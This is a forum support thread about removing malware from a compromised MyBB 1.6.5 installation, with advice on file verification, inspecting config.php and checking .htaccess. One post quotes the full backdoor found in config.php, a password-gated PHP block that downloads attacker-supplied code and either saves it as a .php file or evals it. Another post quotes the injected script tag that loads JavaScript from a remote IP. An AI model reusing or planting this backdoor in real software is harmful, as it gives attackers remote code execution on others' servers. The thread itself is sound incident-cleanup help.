Thread Rating:
  • 1 Vote(s) - 1 Average
  • 1
  • 2
  • 3
  • 4
  • 5
How to remove this js virus
#1
my index file Show A Script
<script id="dgllhguk" src="http://91.196.216.64/s.php?ref=&lc=http://dreamdth.com/Forum/index.php&ua=Mozilla/5.0%20%28Windows%20NT%205.1%3B%20rv%3A5.0%29%20Gecko/20100101%20Firefox/5.0">

i think it is a virus and all antivirus show this multiple or blocked content
it is found on index.php Befor </head> Tag, How can i found this in mybb folder ? what is the location of this script id ? please help me how can delete this script from mybb 1.6.5
#2
Firstly, get rid of that snippet. Second, run File Verification in the ACP. Any files which you have not knowingly changed should be replaced.

Also, make sure there is no malicious code in inc/config.php . Watch carefully, because on occasion malicious code is placed after 2000 blank lines.

If you are paranoid enough, download a mybb package, and check to see if there are any extra files in your installation @ your site.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)
#3
:oops: <removed>
#4
Forum URL??
-Paul H.

Cogisne lingua latina?
#5
You might also want to check your .htaccess file to see if any redirects were added.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)
#6
Thanks GamerVoid For Try to solving My issue
i check my config.php and Get

"if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '50905d7b2216bfeccb5b41016357176b'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}"

on Line number 113, i delete it and Upload Fresh copy of config file thats 100 lines and 2819kb and old file is 6896 kb,
i download mybb 1.6.5 and View Config.php But it show Blank in Notpad++,

Anyone know Config file have above script on 2113 line ?
#7
^ No, that is malicious code ..
#8
You can leave the actual English-like code above the malicious code and almost 2000 white lines. The (what I like to call) cURLy code needs to go though.

config.php is blank in the package because of it being different for everyone. It is written to during install, but see http://wiki.mybb.com/index.php/Inc/config.php to see what a safe config.php file looks like.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)


Forum Jump:


Users browsing this thread: 1 Guest(s)